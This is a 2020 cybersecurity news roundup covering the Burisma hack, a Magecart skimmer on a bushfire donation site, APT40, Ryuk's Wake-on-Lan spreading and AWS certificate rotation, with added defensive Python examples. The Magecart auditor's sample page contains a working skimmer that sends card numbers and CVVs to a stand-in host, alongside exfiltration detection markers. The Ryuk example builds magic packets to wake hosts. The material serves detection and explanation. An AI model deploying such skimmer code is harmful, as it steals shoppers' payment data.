
Russia Hacks Burisma, Ryuk Ransomware & Patch Tuesday!


Today is Tuesday January 14th, 2020 and here are today's most pressing cyber stories in under 5 minutes.

Russia Hacks Ukrainian Gas Firm in the midst of impeachment

Russian military hackers have allegedly launched cyberattacks on Burisma, a Ukrainian gas company at the heart of US President Trump's impeachment case.

According to a report published on Monday by the New York Times, the attacks were launched during November, at the same time that Ukrainian President Volodymyr Zelensky was being pressured by Trump to investigate Joseph Biden, former Vice President under Barack Obama, and his son Hunter, who served on the board of the utility.

 

While it is not known what the hackers were searching for, according to the NYT, cybercriminals under the umbrella of the Russian military "could be searching for potentially embarrassing material on the Bidens -- the same kind of information that Trump wanted from Ukraine."

The style and nature of the attacks on the gas company were similar to those launched against the Democratic National Committee (DNC) in 2016.

It is suspected that the hack was prompted by Russia's desire to interfere with the election. The country has repeatedly denied any involvement.

Good Samaritans helping Aussies with Forest Fire get hit by credit card skimming

Attackers have compromised a website collecting donations for the victims of the Australia bushfires and injected a malicious script that steals the payment information of the donors.

This type of attack is known as Magecart: attackers compromise a website and inject malicious JavaScript into its eCommerce or checkout pages. The script then steals any credit card or payment information that is submitted and sends it to a remote site under the attacker's control.

The Malwarebytes Threat Intelligence Team discovered a legitimate website collecting donations for the tragic bushfires in Australia that had been compromised by a Magecart script.

While the donors were probably not the intended targets of this attack, they are unfortunately caught in the crossfire.

When a visitor of the site adds an item to their cart, such as a donation, a malicious credit-card skimmer script named ATMZOW is loaded into the checkout pages.

When a user submits their payment information as part of the checkout process, the malicious script steals the submitted information and sends it to the vamberlo[.]com domain.
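As an added example (not code from the original post, from Malwarebytes, or from the compromised donation site), the following Python script audits a checkout page's HTML for the two things a Magecart injection typically leaves behind: an external script loaded from a host that is not on the site owner's allowlist, and an inline script that both reads payment fields and ships data off-site. The allowlist, the marker lists, the sample page and every host name in it are constructed for illustration.

```python
"""Audit checkout-page HTML for script injections of the kind used in Magecart attacks.

Added example: the allowlist, marker lists and sample page below are constructed,
not taken from the compromised donation site described in the story.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site owner expects to serve scripts on checkout pages (constructed).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.payment-provider.example"}

# Inline-script markers: access to payment fields, and common ways of sending data off-site.
FIELD_MARKERS = ("cardnumber", "card_number", "ccnum", "cvv", "cvc", "expir")
EXFIL_MARKERS = ("xmlhttprequest", "fetch(", "sendbeacon", "new image", "websocket", "btoa(")


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page: external (src, has-SRI) pairs and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # list of (src, has_integrity_attribute)
        self.inline = []        # list of inline script bodies
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf))


def audit_checkout_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (finding_kind, detail) tuples; an empty list means nothing was flagged."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, has_sri in collector.external:
        host = urlparse(src).hostname          # handles https://, http:// and protocol-relative // URLs
        if host is None:
            continue                           # same-origin relative path: served by the site itself
        if host.lower() not in allowed_hosts:
            findings.append(("unapproved-host", src))
        elif not has_sri:
            # An approved host without Subresource Integrity can still serve a swapped file.
            findings.append(("missing-sri", src))
    for body in collector.inline:
        lowered = body.lower()
        touches_fields = any(m in lowered for m in FIELD_MARKERS)
        exfiltrates = any(m in lowered for m in EXFIL_MARKERS)
        if touches_fields and exfiltrates:
            findings.append(("inline-skimmer-pattern", body.strip()[:80]))
    return findings


# Constructed checkout page: one approved script with SRI, one approved script without it,
# one script from an unknown host, and an inline handler that reads card fields and beacons them out.
SAMPLE_CHECKOUT = """<html><head>
<script src="https://js.payment-provider.example/v3.js" integrity="sha384-EXAMPLEDIGEST" crossorigin="anonymous"></script>
<script src="https://shop.example/static/checkout.js"></script>
<script src="//cdn-static.example/jquery.min.js"></script>
</head><body>
<form id="pay"><input name="cardnumber"><input name="cvv"></form>
<script>
document.forms[0].addEventListener('submit', function () {
  var d = btoa(document.querySelector('[name=cardnumber]').value + '|' + document.querySelector('[name=cvv]').value);
  new Image().src = 'https://cdn-static.example/c?d=' + d;
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_html(SAMPLE_CHECKOUT):
        print(f"{kind}: {detail}")
```

The allowlist approach matters more than the marker list: a skimmer can obfuscate its field access and its exfiltration call, but it still has to run from somewhere, so a script host that is not on the list (or an approved file whose hash no longer matches its integrity attribute) is the durable signal to alert on.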

 

China’s APT40 Hides behind network of front companies

 

An online group of cyber-security analysts calling themselves Intrusion Truth have doxed their fourth Chinese state-sponsored hacking operation. "APT groups in China have a common blueprint: contract hackers and specialists, front companies, and an intelligence officer," the Intrusion Truth team said. "We know that multiple areas of China each have their own APT."

 

While Intrusion Truth has not specifically linked the subjects of its recent blog posts to a particular Chinese hacking group, experts from FireEye and Kaspersky have said that Intrusion Truth's latest revelations refer to a Chinese hacking group they've been previously tracking as APT40.

Per FireEye, APT40 is a Chinese cyber espionage group that has been active since 2013. The group typically targets countries strategically important to China's Belt and Road Initiative, especially those with a focus on engineering and defense. The front companies Intrusion Truth identified use overlapping contact details, share office locations, and have no online presence except to recruit cyber-security experts with offensive security skills, using almost identical job ads.

 

In fact, one of the 13 front companies they identified was headquartered in the University's library. This professor was also a former member of China's military, Intrusion Truth said. Intrusion Truth has a pretty good track record to their name: from their previous three Chinese APT doxes, US authorities have followed through with official indictments in two cases -- namely APT3 and APT10 -- filing official charges against APT group members in November 2017 and December 2018, respectively.

Ryuk Ransomware uses Wake-on-Lan

The Ryuk Ransomware uses the Wake-on-Lan feature to turn on powered-off devices on a compromised network so that it can encrypt them as well.

Wake-on-Lan is a hardware feature that allows a powered-down device to be woken up, or powered on, by sending a special network packet to it. This is useful for administrators who may need to push out updates to a computer or perform scheduled tasks while it is powered down.

According to a recent analysis of the Ryuk Ransomware by Vitali Kremez, Head of SentinelLabs, when the malware is executed it spawns subprocesses with the argument '8 LAN'. When this argument is used, Ryuk scans the device's ARP table, which is a list of known IP addresses on the network and their associated MAC addresses, and checks whether the entries fall under the private IP address prefixes "10.", "172.16.", and "192.168."

If the ARP entry is part of any of those networks, Ryuk will send a Wake-on-Lan (WoL) packet to the device's MAC address to have it power up. This WoL request comes in the form of a 'magic packet' containing 'FF FF FF FF FF FF FF FF'.

 

If Ryuk can then mount the share on the woken device, it will encrypt that remote computer's drive as well. To mitigate this new feature, administrators should only allow Wake-on-Lan packets from administrative devices and workstations.

This would allow administrators to still benefit from the feature while adding some security to the endpoints.

At the same time, this does not help if an administrative workstation is compromised, which happens quite often in targeted ransomware attacks.
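The ARP-table scan, the magic packet and the source-allowlist mitigation described above, worked through in Python as an added example; this is neither Ryuk's code nor code from the SentinelLabs analysis. The `arp -a` output, the MAC addresses and the allowed-source list are constructed. The packet is built in the standard Wake-on-Lan layout (six 0xFF bytes followed by the target MAC repeated sixteen times), which is what a network detector should match on, and the example also shows that the string-prefix test described in the story covers only part of the RFC 1918 172.16.0.0/12 range.

```python
"""Added example: classify ARP entries the way the Ryuk analysis describes, and validate
Wake-on-Lan traffic against an allowlist of administrative hosts.

The ARP output, MAC addresses and allowed-source list below are constructed.
"""
import ipaddress
import re

# The three string prefixes Ryuk is reported to check ARP entries against.
PRIVATE_PREFIXES = ("10.", "172.16.", "192.168.")

# The full RFC 1918 ranges, for comparison with the prefix test.
RFC1918_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed `arp -a` output in the Windows layout.
ARP_SAMPLE = """\
Interface: 192.168.1.20 --- 0x5
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.50          aa-bb-cc-dd-ee-ff     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  172.16.4.9            de-ad-be-ef-00-01     dynamic
  172.20.7.3            de-ad-be-ef-00-02     dynamic
  203.0.113.7           00-aa-bb-cc-dd-ee     dynamic
"""

ARP_LINE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)")


def parse_arp_table(text):
    """Return (ip, mac, type) tuples; MACs are normalised to lower-case colon form."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            entries.append((m.group(1), m.group(2).replace("-", ":").lower(), m.group(3)))
    return entries


def is_private_by_prefix(ip):
    """The literal prefix test described in the story (misses 172.17.x.x through 172.31.x.x)."""
    return ip.startswith(PRIVATE_PREFIXES)


def is_rfc1918(ip):
    """Membership in the full private ranges 10/8, 172.16/12 and 192.168/16."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918_NETS)


def wake_targets(arp_text):
    """Hosts the prefix test would select for a wake-up packet."""
    return [(ip, mac) for ip, mac, _ in parse_arp_table(arp_text) if is_private_by_prefix(ip)]


def magic_packet(mac):
    """Standard WoL magic packet: six 0xFF bytes, then the target MAC sixteen times (102 bytes)."""
    return b"\xff" * 6 + bytes.fromhex(mac.replace(":", "").replace("-", "")) * 16


def extract_wol_target(payload):
    """Return the MAC a payload would wake, or None if it is not a magic packet.
    A SecureOn password may trail the 102 bytes, so only that prefix is checked."""
    if len(payload) < 102 or payload[:6] != b"\xff" * 6:
        return None
    mac = payload[6:12]
    if payload[6:102] != mac * 16:
        return None
    return ":".join(f"{b:02x}" for b in mac)


# Constructed: the only hosts that should be sending wake-ups (the mitigation in the story).
ALLOWED_WOL_SOURCES = {"192.168.1.10"}


def check_wol_packet(src_ip, payload, allowed_sources=ALLOWED_WOL_SOURCES):
    """('ignore', None) for non-WoL traffic, ('allow', mac) from an admin host, ('alert', mac) otherwise."""
    mac = extract_wol_target(payload)
    if mac is None:
        return ("ignore", None)
    return ("allow" if src_ip in allowed_sources else "alert", mac)


if __name__ == "__main__":
    for ip, mac, _ in parse_arp_table(ARP_SAMPLE):
        print(f"{ip:<14} {mac}  prefix={is_private_by_prefix(ip)!s:<5} rfc1918={is_rfc1918(ip)}")
    for ip, mac in wake_targets(ARP_SAMPLE):
        # A wake-up for this MAC arriving from an ordinary workstation should raise an alert.
        print(ip, mac, check_wol_packet("192.168.1.50", magic_packet(mac)))
```

Magic packets are normally sent as UDP broadcasts, so `check_wol_packet` is the logic a sensor would apply to the payload of such a datagram: anything matching the layout that does not originate from an administrative host is worth alerting on, which also covers the case the story notes where the admin workstation itself is compromised, since the sensor can at least record which host issued the wake-ups.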

 

AWS Issues warning to its users

Amazon Web Services has issued an "important" warning to users of its Amazon Aurora, Amazon Relational Database Service (RDS), and Amazon DocumentDB (with MongoDB compatibility) databases, urging them to update their certificates by January 14, 2020. Those who use SSL/TLS certificate validation when they connect to database instances are urged to download and install a fresh certificate, rotate the certificate authority (CA) for the instances, and reboot the instances. Users who don't use SSL/TLS connections or certificate validation don't need to make any updates; however, AWS advises doing so in case they want to use SSL/TLS connections in the future.

This process is standard: SSL/TLS certificates for RDS, Aurora, and DocumentDB expire and are replaced every five years as part of standard maintenance. Users may already have received an email or console notification alerting them to the process.

Instances created on or after January 14 will have the new (CA-2019) certificates, made available in September 2019. Users can temporarily switch back to the old (CA-2015) certificates if needed. CA-2015 certificates will expire on March 5, 2020; at this point, applications that use certificate validation but haven't been updated will lose connectivity.
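The rotation procedure above (install the new CA bundle on validating clients, rotate the instance CA, reboot), turned into a fleet-wide audit as an added example in Python; this is not AWS's code. The instance records and the client inventory are constructed, shaped like the DBInstances entries that describe-db-instances returns, and the planner emits the keyword arguments boto3's modify_db_instance accepts rather than calling AWS, so it runs offline.

```python
"""Added example: plan the CA rotation for a fleet of RDS, Aurora and DocumentDB instances.

The instance records and client inventory are constructed; the record shape mirrors the
DBInstances entries returned by describe-db-instances.
"""
from datetime import date

OLD_CA = "rds-ca-2015"            # expiring certificate authority
NEW_CA = "rds-ca-2019"            # replacement, available since September 2019
OLD_CA_EXPIRY = date(2020, 3, 5)  # after this date, validating clients lose connectivity

# Constructed instances in the shape of describe-db-instances output.
INSTANCES = [
    {"DBInstanceIdentifier": "orders-prod", "Engine": "postgres", "CACertificateIdentifier": "rds-ca-2015"},
    {"DBInstanceIdentifier": "analytics", "Engine": "aurora-mysql", "CACertificateIdentifier": "rds-ca-2019"},
    {"DBInstanceIdentifier": "legacy-reporting", "Engine": "mysql", "CACertificateIdentifier": "rds-ca-2015"},
]
# Constructed: whether each instance's clients verify the server certificate (e.g. sslmode=verify-full).
CLIENTS_VALIDATE_TLS = {"orders-prod": True, "analytics": True, "legacy-reporting": False}


def plan_rotation(instances, clients_validate, today):
    """Return one work item per instance still on the old CA, most urgent first."""
    days_left = (OLD_CA_EXPIRY - today).days
    plan = []
    for inst in instances:
        if inst["CACertificateIdentifier"] != OLD_CA:
            continue                      # already rotated: nothing to do
        ident = inst["DBInstanceIdentifier"]
        # An instance whose clients are not in the inventory is treated as validating (worst case).
        validates = clients_validate.get(ident, True)
        steps = []
        if validates:
            steps.append("install the new CA bundle on every client that validates the server certificate")
        steps += ["switch the instance to the new CA", "reboot the instance so it serves the new certificate"]
        plan.append({
            "instance": ident,
            "engine": inst["Engine"],
            # Validating clients break on March 5, 2020; others merely lose the option to validate later.
            "urgency": "required" if validates else "recommended",
            "days_until_old_ca_expires": days_left,
            "steps": steps,
            # Keyword arguments for boto3's rds client.modify_db_instance(...).
            "modify_db_instance_kwargs": {
                "DBInstanceIdentifier": ident,
                "CACertificateIdentifier": NEW_CA,
                "ApplyImmediately": True,
            },
        })
    plan.sort(key=lambda item: 0 if item["urgency"] == "required" else 1)
    return plan


if __name__ == "__main__":
    for item in plan_rotation(INSTANCES, CLIENTS_VALIDATE_TLS, date(2020, 1, 14)):
        print(f"{item['instance']} ({item['engine']}): {item['urgency']}, "
              f"{item['days_until_old_ca_expires']} days left")
        for step in item["steps"]:
            print("  -", step)
```

The ordering of the steps is the point a practitioner cares about: the client-side bundle has to be in place before the instance starts serving a certificate chained to the new CA, otherwise a validating client is cut off by the rotation itself rather than by the March 5 expiry.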
 

UNG Wins NSA Codebreakers Challenge

The University of North Georgia (UNG) scored a decisive victory in the 2019 National Security Agency (NSA) Codebreaker Challenge, which ran for 110 days and finished Jan. 10. UNG students, faculty and staff tallied 230,450 points, more than tripling second-place Georgia Tech's 56,050. Third-place Oregon State University was the only other school to top 40,000 points. A total of 531 universities and colleges competed.

 

"I'm proud to be the coach of the No. 1 cyber operations university team in America," said Dr. Bryson Payne, director of UNG's Center for Cyber Operations Education and professor of computer science. "These young men and women have worked harder over the past 110 days than any other team in the country."

UNG had 184 of its participants complete at least one of the seven tasks, one of which consisted of two parts. Thirty UNG participants finished all seven tasks.